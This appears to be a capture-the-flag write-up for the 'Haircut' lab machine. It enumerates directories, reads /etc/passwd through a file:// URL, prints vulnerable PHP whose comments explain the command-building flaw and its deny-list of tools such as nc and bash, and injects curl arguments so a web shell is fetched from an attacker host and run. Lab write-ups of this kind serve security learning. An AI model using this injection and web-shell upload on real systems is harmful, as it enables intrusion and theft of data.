2 :80

$ gobuster dir -u http://10.10.10.24 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt -t 90
===============================================================
/index.html           (Status: 200) [Size: 144]
/uploads              (Status: 301) [Size: 194] [--> http://10.10.10.24/uploads/]
/test.html            (Status: 200) [Size: 223]
/hair.html            (Status: 200) [Size: 141]
/exposed.php          (Status: 200) [Size: 446]

http://10.10.10.24/exposed.php
Enter the Hairdresser's location you would like to check. Example: http://localhost/test.html 
| the page contains an input form and fetches whatever URL is submitted

# http://localhost/../../../etc/passwd | http://localhost/../../etc/passwd
404 Not Found

# trying command injection
;ls
<> is not a good thing to put in a URL 

# blacklisted chars
;
&
|
{
}

# $ < > are not blacklisted

# the program behind the form is curl: submitting an empty value returns curl's usage hint
<empty>
Requesting Site...
curl: try 'curl --help' or 'curl --manual' for more information 

# trying file:///etc/passwd
root:x:0:0:root:/root:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
maria:x:1000:1000:maria,,,:/home/maria:/bin/bash

file:///var/www/html/exposed.php
<span>
		<?php 
			// Handler for the location-check form: reads the POSTed `formurl`, rejects it
			// if it contains any deny-listed substring, and otherwise appends it to a
			// `curl` command line and echoes whatever that command prints.
			//
			// NOTE(review): root cause of the findings in these notes. User input reaches
			// shell_exec() unquoted and with no scheme restriction, so the deny-list below
			// is the only control. A safer design validates the value as a URL, allows
			// only http/https (e.g. the PHP curl extension with CURLOPT_PROTOCOLS, or
			// curl's --proto option), and never builds a shell string; if a shell call is
			// unavoidable, pass the value through escapeshellarg() after a `--` separator.
			if(isset($_POST['formurl'])){
			echo "<p>Requesting Site...</p>"; 
			$userurl=$_POST['formurl'];
			// Set to 1 as soon as any deny-listed substring is found in the input.
			$naughtyurl=0;
			// Deny-list of substrings. It does not include whitespace, '-', '$', '<' or
			// '>', and a deny-list cannot enumerate everything a shell or curl treats
			// specially, which is why it fails as an input filter.
			$disallowed=array('%','!','|',';','python','nc','perl','bash','&','#','{','}','[',']');
			foreach($disallowed as $naughty){
				// strpos() is a case-sensitive substring search; any hit marks the input as rejected.
				if(strpos($userurl,$naughty) !==false){
					// Prints the matched deny-list entry (a constant from the array, not the raw input).
					echo $naughty.' is not a good thing to put in a URL';
					$naughtyurl=1;
				}
			}
			if($naughtyurl==0){
				// The value is concatenated as-is, so the shell splits it on whitespace and
				// curl receives every word as a separate argument; stderr is merged into the
				// output. The result is echoed without HTML escaping (htmlspecialchars() is
				// not applied), so the fetched content is reflected raw into the page.
				echo shell_exec("curl ".$userurl." 2>&1"); 
			}
			}
		?>
</span>

# the command that runs is just `curl <URL> 2>&1`; the submitted value is inserted unquoted, so anything after a space is parsed by curl as further arguments

trying http://10.10.16.7/web.php -o uploads/web.php

# web shell at 
http://haircut.htb/uploads/web.php

CMD: whoami;id;hostname;uname -a
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
haircut
Linux haircut 4.4.0-78-generic #99-Ubuntu SMP Thu Apr 27 15:29:09 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
